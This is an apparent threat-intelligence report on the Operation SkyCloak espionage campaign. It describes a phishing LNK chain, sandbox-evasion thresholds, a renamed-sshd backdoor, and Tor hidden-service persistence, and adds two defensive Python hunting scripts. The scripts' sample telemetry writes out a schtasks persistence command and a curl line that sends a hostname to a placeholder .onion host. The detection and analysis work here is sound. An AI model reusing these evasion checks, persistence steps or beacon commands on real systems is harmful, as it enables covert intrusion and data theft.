Operation SkyCloak: Unveiling the Tor-Enabled OpenSSH Backdoor Targeting Defense Sectors
In a sophisticated cyber espionage campaign dubbed Operation SkyCloak, threat actors are deploying advanced malware targeting the defense sectors in Russia and Belarus. This operation leverages weaponized attachments in phishing emails to infiltrate systems and establish persistent backdoors, utilizing OpenSSH in conjunction with customized Tor hidden services to obfuscate network traffic.
Phishing Tactics and Initial Infection
The attackers initiate their campaign by sending phishing emails that appear to contain military-related documents. These emails entice recipients to open a ZIP file, which conceals a hidden folder containing another archive and a Windows shortcut (LNK) file. When the LNK file is executed, it triggers a multi-stage infection process designed to compromise the target system.
Multi-Stage Infection Chain
Upon execution, the LNK file initiates PowerShell commands that act as the initial dropper. This stage involves extracting another archive file and setting up the subsequent stages of the infection chain. Notably, some of these malicious archive files were uploaded from Belarus to the VirusTotal platform in October 2025, indicating a possible origin or testing ground for the malware.
Anti-Analysis Mechanisms
To evade detection and analysis, the malware incorporates several anti-analysis checks. One such module, a PowerShell stager, performs environment-awareness checks to determine whether it is running in a sandbox. It verifies that the number of recent LNK files on the system is at least 10 and that the current process count is 50 or more. If either condition is not met, the stager terminates without deploying the later stages. Freshly provisioned analysis virtual machines typically have few recently opened documents and few running processes, so these thresholds let the malware run on real user workstations while staying dormant in automated analysis environments.
Establishing Persistence and Backdoor Access
Once the malware confirms it is operating in a genuine user environment, it proceeds to establish persistence on the compromised machine. It does this by creating a scheduled task named githubdesktopMaintenance, which runs automatically at user logon and at regular intervals throughout the day. This task launches githubdesktop.exe, a renamed copy of sshd.exe, the legitimate OpenSSH server executable for Windows. The SSH service accepts only connections authenticated with the attacker's pre-deployed authorized keys, which are stored in the same directory, so the result is a key-authenticated backdoor that only the operators can use.
Utilizing Tor for Anonymity and Obfuscation
In addition to the SSH backdoor, the malware sets up a customized Tor hidden service to further conceal its activities. It creates another scheduled task to execute pinterest.exe, a modified Tor binary that communicates with the attacker’s .onion address. This setup employs obfs4, a Tor pluggable transport designed to obfuscate traffic, making it more difficult to detect and analyze. Furthermore, the hidden service forwards ports for critical Windows services such as Remote Desktop Protocol (RDP), SSH, and Server Message Block (SMB) to the local machine, so the attackers can reach those services through the Tor network without any inbound connection appearing at the network perimeter.
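The Tor configuration pattern described above can be checked for in an incident-response triage. The following added example (not code from the report or from the malware) parses a constructed torrc fragment, flags any hidden-service forward that exposes RDP, SSH or SMB, and notes whether a pluggable-transport bridge such as obfs4 is configured. The directive names (HiddenServiceDir, HiddenServicePort, UseBridges, ClientTransportPlugin, Bridge) are standard Tor options; the paths, bridge address, fingerprint and certificate values are placeholders, and stripping everything after `#` on a line is a simplification of Tor's own parser.

```python
"""Triage a torrc-style configuration for hidden-service forwards to sensitive local services."""

# Constructed sample torrc, modelled on the behaviour described in the write-up.
# Paths, bridge address, fingerprint and cert are placeholders, not campaign indicators.
SAMPLE_TORRC = r"""
# constructed example config
SocksPort 9050
UseBridges 1
ClientTransportPlugin obfs4 exec C:\Users\alice\AppData\Local\pinterest\obfs4proxy.exe
Bridge obfs4 198.51.100.7:443 0000000000000000000000000000000000000000 cert=PLACEHOLDER iat-mode=0
HiddenServiceDir C:\Users\alice\AppData\Local\pinterest\hs
HiddenServicePort 3389 127.0.0.1:3389
HiddenServicePort 22 127.0.0.1:22
HiddenServicePort 445 127.0.0.1:445
"""

# Local services whose exposure through an onion service is a strong remote-access signal.
SENSITIVE_PORTS = {22: "SSH", 445: "SMB", 3389: "RDP"}


def parse_torrc(text):
    """Return (directive, args) pairs; comments and blank lines are skipped (simplified parser)."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        entries.append((parts[0], parts[1] if len(parts) > 1 else ""))
    return entries


def target_port(args):
    """Resolve the local target port of a HiddenServicePort line (VIRTPORT [TARGET])."""
    fields = args.split()
    target = fields[1] if len(fields) > 1 else fields[0]  # target defaults to the virtual port
    if target.startswith("unix:"):
        return None  # unix-socket targets have no TCP port
    return int(target.rsplit(":", 1)[-1])


def assess(text):
    """Return human-readable findings for forwards to sensitive ports and bridge transports."""
    findings = []
    transports = set()
    for directive, args in parse_torrc(text):
        d = directive.lower()
        if d == "hiddenserviceport":
            port = target_port(args)
            if port in SENSITIVE_PORTS:
                findings.append(f"hidden service exposes {SENSITIVE_PORTS[port]} (local port {port})")
        elif d == "clienttransportplugin":
            transports.add(args.split()[0].lower())
        elif d == "bridge":
            first = args.split()[0].lower()
            if first in transports or first == "obfs4":
                findings.append(f"pluggable transport bridge configured: {first}")
    return findings


if __name__ == "__main__":
    for finding in assess(SAMPLE_TORRC):
        print(finding)
```

On a live host the directory named by HiddenServiceDir is worth collecting as well: Tor writes the service's .onion address to a file called `hostname` inside it, so a `hostname` file under a user profile directory is a direct artifact of the identifier this campaign reports back to its operators.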
Data Exfiltration and Remote Control
Once the connection is established, the malware exfiltrates system information, including the unique .onion hostname of the hidden service, which identifies the compromised system. This information is sent to the attackers via a curl command, giving them the address they need to reach the infected machine through the Tor network and take remote control of it.
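The persistence mechanism (renamed sshd.exe launched by a scheduled task from a user-writable directory) and the curl-based reporting of the .onion hostname both leave traces in ordinary process-creation telemetry. The following added example (not code from the report) runs three hunting rules over constructed Sysmon-style events: a binary whose PE OriginalFileName is sshd.exe but whose on-disk name differs, a schtasks /create whose action points into a user profile directory, and a curl invocation that either uses the local Tor SOCKS port or mentions a .onion host. The event records, paths, task arguments and onion hostname are constructed for illustration; the assumption that the exfiltration passes through a local SOCKS proxy on a 9xxx port is mine, not a detail from the report.

```python
"""Hunt process-creation telemetry for renamed OpenSSH servers, suspicious scheduled tasks and Tor-bound curl."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record with the Sysmon Event ID 1 fields this hunt needs."""
    image: str               # full path of the executed binary
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str


# Constructed sample telemetry; nothing here is a real campaign indicator.
SAMPLE_EVENTS = [
    # Legitimate OpenSSH server from its usual install location.
    ProcEvent(r"C:\Windows\System32\OpenSSH\sshd.exe", "sshd.exe",
              r"C:\Windows\System32\OpenSSH\sshd.exe"),
    # Renamed sshd.exe started from a user-writable directory.
    ProcEvent(r"C:\Users\alice\AppData\Local\GitHubDesktop\githubdesktop.exe", "sshd.exe",
              r'"C:\Users\alice\AppData\Local\GitHubDesktop\githubdesktop.exe" -f sshd_config'),
    # Scheduled task re-launching the renamed binary at logon.
    ProcEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
              r'schtasks /create /tn githubdesktopMaintenance /sc ONLOGON /tr "C:\Users\alice\AppData\Local\GitHubDesktop\githubdesktop.exe"'),
    # Beacon reporting the hidden-service hostname through the local Tor SOCKS port (assumed transport).
    ProcEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
              r"curl --socks5-hostname 127.0.0.1:9050 -d hostname=placeholderonionhostnameabcd.onion http://placeholderonionhostnameabcd.onion/reg"),
    # Benign curl to a normal site.
    ProcEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
              r"curl https://example.com/update.json"),
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\", re.I)
TOR_LOCAL_PROXY = re.compile(r"--socks5(-hostname)?\s+127\.0\.0\.1:9\d{3}", re.I)
ONION_HOST = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.I)
TASK_ACTION = re.compile(r'/tr\s+"?([^"]+?)"?(?:\s|$)', re.I)


def basename(path):
    """Lower-case file name of a Windows path, tolerating surrounding quotes."""
    return ntpath.basename(path.strip('"')).lower()


def hunt(events):
    """Return (rule, evidence) pairs for every event that matches a hunting rule."""
    findings = []
    for ev in events:
        name = basename(ev.image)
        cmd = ev.command_line
        # Rule 1: OpenSSH server binary running under a different file name.
        if ev.original_file_name.lower() == "sshd.exe" and name != "sshd.exe":
            findings.append(("renamed_openssh_server", ev.image))
        # Rule 2: scheduled task whose action lives in a user profile directory.
        if name == "schtasks.exe" and "/create" in cmd.lower():
            m = TASK_ACTION.search(cmd)
            if m and USER_WRITABLE.search(m.group(1)):
                findings.append(("schtask_to_user_writable_binary", m.group(1)))
        # Rule 3: curl talking to Tor, either via the local SOCKS port or to a .onion host.
        if name == "curl.exe" and (TOR_LOCAL_PROXY.search(cmd) or ONION_HOST.search(cmd)):
            findings.append(("curl_via_tor_or_onion", cmd))
    return findings


if __name__ == "__main__":
    for rule, evidence in hunt(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

Rule 1 depends on the attacker leaving the PE version resource intact when renaming sshd.exe; pairing it with a check for sshd.exe-derived binaries outside the OpenSSH install directory, or with a hash or import-table match, covers the case where the version information has been stripped.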
Attribution and Implications
While the exact identity of the threat actors behind Operation SkyCloak remains unknown, the tactics, techniques, and procedures (TTPs) observed are consistent with Eastern European-linked espionage activities targeting defense and government sectors. Security researchers have noted similarities with previous campaigns attributed to groups such as UAC-0125, suggesting a possible connection or shared methodologies.
Conclusion
Operation SkyCloak represents a significant advancement in cyber espionage tactics, combining sophisticated phishing techniques, multi-stage infection chains, and the use of anonymizing networks like Tor to establish persistent backdoors in targeted systems. The campaign’s focus on the defense sectors of Russia and Belarus underscores the strategic importance of these targets and highlights the ongoing threats faced by national security infrastructures.